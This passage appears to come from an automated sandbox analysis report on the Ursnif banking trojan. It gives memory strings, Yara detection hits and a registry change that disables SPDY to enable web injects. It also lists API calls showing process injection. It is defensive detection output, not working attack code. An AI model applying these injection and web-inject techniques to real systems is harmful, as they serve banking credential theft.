            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms04.5172
            Source: RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsLC.Hulu
            Source: RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
            Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
            Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgX
            Source: powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
            Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
            Source: RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6328, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6828, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 6328, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4604, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            barindex
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B83830 NtWriteVirtualMemory,25_2_00B83830
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8387C NtCreateSection,25_2_00B8387C
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B7BAB4 NtAllocateVirtualMemory,25_2_00B7BAB4
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B81AC4 NtQueryInformationProcess,25_2_00B81AC4
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B7CCA0 NtReadVirtualMemory,25_2_00B7CCA0
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9ADD4 NtQueryInformationProcess,25_2_00B9ADD4
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8F560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,25_2_00B8F560
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,25_2_00B9F7EC
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B8FFCC NtMapViewOfSection,25_2_00B8FFCC
            Source: C:\Windows\System32\control.exeCode function: 25_2_00B9676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,25_2_00B9676C
            Source: C:\Windows\System32\control.exeCode function: 25_2_00BB1002 NtProtectVirtualMemory,NtProtectVirtualMemory,25_2_00BB1002
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74EF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,39_2_0000027FF74EF7EC
            Source: C:\Windows\System32\rundll32.exeCode function: 39_2_0000027FF74D1AC4 NtQueryInformationProcess,39_2_0000027FF74D1AC4
